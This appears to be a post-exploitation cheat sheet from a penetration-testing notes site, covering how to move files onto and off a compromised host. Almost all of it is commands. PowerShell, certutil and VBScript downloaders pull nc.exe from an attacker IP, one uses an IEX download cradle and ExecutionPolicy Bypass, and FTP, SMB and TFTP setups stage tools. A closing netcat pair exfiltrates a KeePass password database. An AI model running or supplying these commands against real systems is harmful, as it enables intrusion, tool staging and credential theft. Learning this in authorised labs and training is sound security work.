Transferring Files

How to transfer files

There are various ways to transfer files once an initial foot has been made.

HTTP

The simplest way to transfer files from one box to another is by using Python SimpleHTTPServer module as can be seen below:

python -m SimpleHTTPServer <port number>

Powershell

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.10.20/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.10.20/nc.exe -Destination C:\temp\nc.exe")
powershell wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.20/nc.exe')" 
echo $storageDir = $pwd > wget1.ps1
echo $webclient = New-Object System.Net.WebClient >> wget1.ps1
echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1
echo $file = "new-nc.exe" >> wget1.ps1
echo $webclient.DownloadFile($url,$file) >> wget1.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1

Certutil

certutil.exe -urlcache -split -f "http://10.10.10.20/nc.exe" c:\temp\nc.exe

VBScript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

TFTP

On Linux:
mkdir /tftp
atftpd --daemon --port 69 ~/tftp

On Windows:
tftp -i 10.10.10.20 GET nc.exe

FTP

Install it first and start service

apt-get install pure-ftpd
service pure-ftpd start

Set up the attacking machine

On the target machine run:

echo open 10.10.10.32 21> ftp1.txt        <--- Attacking IP
echo username>> ftp1.txt                  <--- Your username
echo password>> ftp1.txt                  <--- Your password
echo binary>> ftp1.txt		
echo GET executable.exe>> ftp1.txt
echo bye>> ftp1.txt
ftp -s:ftp1.txt

SMB

On Kali-Linux:
python /usr/share/doc/python-impacket/examples/smbserver.py dir-name .
python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name .

On Windows:
copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer .

Base64 transfer binaries

# On target
base64 -w0 /path/to/binary    <-- copy the content and save into a .b64 file.

# On my kali
base64 -d filename.bs64 > mybinary
chmod +x mybinary

Windows to Linux

### On a Windows Target ###

nc.exe -v -w 30 -p 4444 -l < some_password.kdbx
listening on [any] 4444 ...


### ON MY KALI ###

nc -v -w 2 TARGET_IP 4444 > password.kdbx
TARGET_IP [TARGET_IP ] 4444 (?) open
PreviousPostgreslNextMetasploit Framework

Last updated